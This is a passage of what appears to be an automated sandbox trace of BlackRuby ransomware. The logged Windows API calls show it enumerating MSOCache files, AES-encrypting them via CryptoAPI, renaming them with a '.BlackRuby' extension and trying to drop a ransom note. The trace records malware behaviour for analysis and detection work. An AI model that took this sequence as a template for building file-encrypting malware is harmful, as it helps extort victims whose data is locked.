(hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.146] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0046.146] GetLastError () returned 0x0 [0046.146] SetErrorMode (uMode=0x1) returned 0x0 [0046.146] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.147] GetLastError () returned 0xb7 [0046.147] GetFileType (hFile=0x184) returned 0x1 [0046.147] SetErrorMode (uMode=0x0) returned 0x1 [0046.147] GetFileType (hFile=0x184) returned 0x1 [0046.149] CloseHandle (hObject=0x184) returned 1 [0046.149] GetLastError () returned 0xb7 [0046.149] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml", lpFilePart=0x0) returned 0x4e [0046.149] GetLastError () returned 0xb7 [0046.149] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Encrypted_KXaSdUffzwUvZONKGyEgoRRbe0X0M02GWvH9WKjSvgAedk.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Encrypted_KXaSdUffzwUvZONKGyEgoRRbe0X0M02GWvH9WKjSvgAedk.BlackRuby", lpFilePart=0x0) returned 0x81 [0046.149] GetLastError () returned 0xb7 [0046.149] SetErrorMode (uMode=0x1) returned 0x0 [0046.149] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23b6b600, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5d0)) returned 1 [0046.149] GetLastError () returned 0xb7 [0046.149] SetErrorMode (uMode=0x0) returned 0x1 [0046.149] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Encrypted_KXaSdUffzwUvZONKGyEgoRRbe0X0M02GWvH9WKjSvgAedk.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\encrypted_kxasduffzwuvzonkgyegorrbe0x0m02gwvh9wkjsvgaedk.blackruby")) returned 1 [0046.149] GetLastError () returned 0xb7 [0046.152] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.152] GetLastError () returned 0xb7 [0046.152] SetErrorMode (uMode=0x1) returned 0x0 [0046.152] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.152] GetLastError () returned 0x5 [0046.153] SetErrorMode (uMode=0x0) returned 0x1 [0046.153] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.153] GetLastError () returned 0x5 [0046.153] SetErrorMode (uMode=0x1) returned 0x0 [0046.153] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b482a0 | out: lpFileInformation=0x1b482a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x39c22cb0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x73c)) returned 1 [0046.154] GetLastError () returned 0x5 [0046.154] SetErrorMode (uMode=0x0) returned 0x1 [0046.154] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.154] GetLastError () returned 0x5 [0046.154] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.154] GetLastError () returned 0x5 [0046.154] SetErrorMode (uMode=0x1) returned 0x0 [0046.154] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.154] GetLastError () returned 0x0 [0046.154] GetFileType (hFile=0x184) returned 0x1 [0046.154] SetErrorMode (uMode=0x0) returned 0x1 [0046.154] GetFileType (hFile=0x184) returned 0x1 [0046.154] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x73c [0046.154] GetLastError () returned 0x0 [0046.154] ReadFile (in: hFile=0x184, lpBuffer=0x1b4a7f4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b4a7f4*, lpNumberOfBytesRead=0x18ed84*=0x73c, lpOverlapped=0x0) returned 1 [0046.159] GetLastError () returned 0x0 [0046.160] CloseHandle (hObject=0x184) returned 1 [0046.160] GetLastError () returned 0x0 [0046.160] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.160] GetLastError () returned 0x0 [0046.160] SetErrorMode (uMode=0x1) returned 0x0 [0046.160] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x39c22cb0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x73c)) returned 1 [0046.160] GetLastError () returned 0x0 [0046.160] SetErrorMode (uMode=0x0) returned 0x1 [0046.160] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0046.160] GetLastError () returned 0x0 [0046.193] CryptImportKey (in: hProv=0x37c680, pbData=0x1ba6308, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0046.193] GetLastError () returned 0x0 [0046.193] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.193] GetLastError () returned 0x0 [0046.199] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0046.199] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1bd3354*=0x1, dwFlags=0x0) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1bd3320, dwFlags=0x0) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd339c*, pdwDataLen=0x18ed74*=0x830, dwBufLen=0x830 | out: pbData=0x1bd339c*, pdwDataLen=0x18ed74*=0x830) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd4428*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bd4428*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd4458*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bd4458*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.199] GetLastError () returned 0x0 [0046.199] CryptDestroyKey (hKey=0x360a20) returned 1 [0046.199] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.199] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.199] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.199] GetLastError () returned 0x0 [0046.199] SetErrorMode (uMode=0x1) returned 0x0 [0046.199] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.200] GetLastError () returned 0xb7 [0046.200] GetFileType (hFile=0x184) returned 0x1 [0046.200] SetErrorMode (uMode=0x0) returned 0x1 [0046.200] GetFileType (hFile=0x184) returned 0x1 [0046.202] CloseHandle (hObject=0x184) returned 1 [0046.202] GetLastError () returned 0xb7 [0046.202] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.202] GetLastError () returned 0xb7 [0046.202] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Encrypted_WsoRoGmLrctYpn7NheEv2u7gWSxHI3LC6ZyVlwv.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Encrypted_WsoRoGmLrctYpn7NheEv2u7gWSxHI3LC6ZyVlwv.BlackRuby", lpFilePart=0x0) returned 0x7a [0046.202] GetLastError () returned 0xb7 [0046.202] SetErrorMode (uMode=0x1) returned 0x0 [0046.202] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23bdda20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x840)) returned 1 [0046.202] GetLastError () returned 0xb7 [0046.202] SetErrorMode (uMode=0x0) returned 0x1 [0046.202] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\Encrypted_WsoRoGmLrctYpn7NheEv2u7gWSxHI3LC6ZyVlwv.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\encrypted_wsorogmlrctypn7nheev2u7gwsxhi3lc6zyvlwv.blackruby")) returned 1 [0046.202] GetLastError () returned 0xb7 [0046.203] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.203] GetLastError () returned 0xb7 [0046.203] SetErrorMode (uMode=0x1) returned 0x0 [0046.203] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.203] GetLastError () returned 0x5 [0046.204] SetErrorMode (uMode=0x0) returned 0x1 [0046.204] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.204] GetLastError () returned 0x5 [0046.204] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.204] GetLastError () returned 0x5 [0046.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.204] GetLastError () returned 0x5 [0046.204] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.204] GetLastError () returned 0x5 [0046.204] SetErrorMode (uMode=0x1) returned 0x0 [0046.204] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0046.205] GetLastError () returned 0x5 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.205] GetLastError () returned 0x5 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.205] GetLastError () returned 0x5 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.205] GetLastError () returned 0x5 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.205] GetLastError () returned 0x5 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.205] GetLastError () returned 0x5 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.205] GetLastError () returned 0x12 [0046.205] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0046.205] SetErrorMode (uMode=0x0) returned 0x1 [0046.205] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.205] GetLastError () returned 0x12 [0046.205] SetErrorMode (uMode=0x1) returned 0x0 [0046.205] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0046.205] GetLastError () returned 0x12 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.205] GetLastError () returned 0x12 [0046.205] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.206] GetLastError () returned 0x12 [0046.206] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.206] GetLastError () returned 0x12 [0046.206] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.206] GetLastError () returned 0x12 [0046.206] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.206] GetLastError () returned 0x12 [0046.206] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.206] GetLastError () returned 0x12 [0046.206] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0046.206] SetErrorMode (uMode=0x0) returned 0x1 [0046.206] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.206] GetLastError () returned 0x12 [0046.206] SetErrorMode (uMode=0x1) returned 0x0 [0046.206] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bf5be0 | out: lpFileInformation=0x1bf5be0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x644b6a20, ftCreationTime.dwHighDateTime=0x1cbe47d, ftLastAccessTime.dwLowDateTime=0x644b6a20, ftLastAccessTime.dwHighDateTime=0x1cbe47d, ftLastWriteTime.dwLowDateTime=0x9d29c940, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x1861)) returned 1 [0046.206] GetLastError () returned 0x12 [0046.206] SetErrorMode (uMode=0x0) returned 0x1 [0046.207] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.207] GetLastError () returned 0x12 [0046.207] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.207] GetLastError () returned 0x12 [0046.207] SetErrorMode (uMode=0x1) returned 0x0 [0046.207] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.207] GetLastError () returned 0x0 [0046.207] GetFileType (hFile=0x184) returned 0x1 [0046.207] SetErrorMode (uMode=0x0) returned 0x1 [0046.207] GetFileType (hFile=0x184) returned 0x1 [0046.207] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x1861 [0046.207] GetLastError () returned 0x0 [0046.207] ReadFile (in: hFile=0x184, lpBuffer=0x1bf7b3c, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bf7b3c*, lpNumberOfBytesRead=0x18ed84*=0x1861, lpOverlapped=0x0) returned 1 [0046.217] GetLastError () returned 0x0 [0046.217] CloseHandle (hObject=0x184) returned 1 [0046.217] GetLastError () returned 0x0 [0046.217] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.217] GetLastError () returned 0x0 [0046.217] SetErrorMode (uMode=0x1) returned 0x0 [0046.217] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x644b6a20, ftCreationTime.dwHighDateTime=0x1cbe47d, ftLastAccessTime.dwLowDateTime=0x644b6a20, ftLastAccessTime.dwHighDateTime=0x1cbe47d, ftLastWriteTime.dwLowDateTime=0x9d29c940, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x1861)) returned 1 [0046.217] GetLastError () returned 0x0 [0046.217] SetErrorMode (uMode=0x0) returned 0x1 [0046.217] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0046.217] GetLastError () returned 0x0 [0046.252] CryptImportKey (in: hProv=0x37c708, pbData=0x1c54fdc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e20) returned 1 [0046.252] GetLastError () returned 0x0 [0046.252] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.252] GetLastError () returned 0x0 [0046.256] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360de0) returned 1 [0046.257] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1c82028*=0x1, dwFlags=0x0) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1c81ff4, dwFlags=0x0) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c82070*, pdwDataLen=0x18ed74*=0x1960, dwBufLen=0x1960 | out: pbData=0x1c82070*, pdwDataLen=0x18ed74*=0x1960) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8535c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c8535c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c8538c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c8538c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.257] GetLastError () returned 0x0 [0046.257] CryptDestroyKey (hKey=0x360e20) returned 1 [0046.257] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.257] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.257] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.257] GetLastError () returned 0x0 [0046.257] SetErrorMode (uMode=0x1) returned 0x0 [0046.257] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-0000-0000000ff1ce}-c\\setup.xml"), 